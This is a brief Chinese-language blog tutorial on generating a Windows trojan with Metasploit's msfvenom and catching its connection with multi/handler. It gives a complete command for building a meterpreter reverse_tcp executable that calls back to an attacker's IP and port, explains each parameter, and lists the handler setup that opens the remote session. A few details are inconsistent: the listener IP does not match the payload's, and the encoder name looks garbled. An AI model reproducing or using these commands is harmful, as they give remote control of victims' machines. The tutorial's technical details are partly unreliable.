一:利用msfconsole生成windows木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe
参数说明:
- -p:指定生成的类型
- lhost:攻击者的ip地址
- lport:攻击者的端口
- -e:木马的编码方式
- -f:生成的文件格式
- -o:输出文件
二:利用msfconsole攻击
配置参数:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.129
set LPORT 4444
exploit
三:windows运行木马
成功得到反弹
具体攻击细节,我们将会在第二节演示!
版权属于:逍遥子大表哥
本文链接:https://blog.bbskali.cn/300.html
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
此处评论已关闭